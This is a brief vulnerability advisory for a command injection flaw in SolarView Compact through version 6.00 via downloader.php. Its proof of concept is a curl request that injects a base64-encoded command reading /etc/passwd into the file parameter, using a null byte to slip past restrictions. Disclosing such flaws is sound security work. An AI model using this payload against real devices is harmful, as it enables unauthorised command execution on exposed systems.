Summary:

There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.

Vendor:

SolarView Compact

Affected Product:

SolarView Compact

Version:

SolarView Compact <=ver 6.00

poc:

curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0

Details:

Commands can be injected by bypassing internal restrictions by accessing the file parameter of the downloader.php page.

About

There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.